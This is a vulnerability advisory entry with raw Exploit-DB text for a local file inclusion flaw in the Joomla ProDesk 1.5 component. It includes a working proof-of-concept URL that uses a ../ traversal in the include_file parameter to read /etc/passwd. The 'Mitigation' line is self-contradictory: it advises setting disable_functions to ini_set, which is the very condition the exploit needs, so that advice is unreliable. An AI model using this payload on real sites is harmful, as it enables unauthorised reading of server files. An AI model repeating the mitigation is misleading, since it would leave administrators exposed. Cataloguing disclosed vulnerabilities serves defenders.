Joomla Component ProDesk v 1.5 (com_pro_desk&include_file) Local File Inclusion

vendor:

ProDesk

by:

d3v1l [Avram Marius]

7,5

CVSS

HIGH

Local File Inclusion

CWE

Product Name: ProDesk

Affected Version From: 1.5

Affected Version To: 1.5

Patch Exists: NO

Related CWE: N/A

CPE: a:joomlashowroom:pro_desk

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

Joomla Component ProDesk v 1.5 (com_pro_desk&include_file) Local File Inclusion

Joomla Component ProDesk v 1.5 is vulnerable to Local File Inclusion. An attacker can exploit this vulnerability to include local files on the server. This vulnerability requires magic_quotes to be set to OFF and disable_functions to be set to ini_set. The PoC for this vulnerability is http://site.com/index.php?option=com_pro_desk&include_file=../../../../../../etc/passwd

Mitigation:

Ensure that magic_quotes is set to ON and disable_functions is set to ini_set.

Source

Exploit-DB raw data:

[~]-------------------------------------------------------------------------------------------------------
[~] Joomla Component ProDesk v 1.5 (com_pro_desk&include_file) Local File Inclusion  
[~]
[~] http://joomlashowroom.com
[~]  
[~] Price - $ 49.99
[~] ----------------------------------------------------------------------------------------------------
[~] Bug founded by d3v1l [Avram Marius]
[~]
[~] Date: 7.11.2010
[~]
[~] http://security-sh3ll.blogspot.com | http://twitter.com/securityshell
[~]
[~] -----------------------------------------------------------------------------------------------------
[~] Poc :-
[~]
[~] http://site.com/index.php?option=com_pro_desk&include_file=../../../../../../etc/passwd
[~]  
[~] Note :-
[~]
[~] Need: magic_quotes=OFF - Need: disable_functions=ini_set
[~]-------------------------------------------------------------------------------------------------------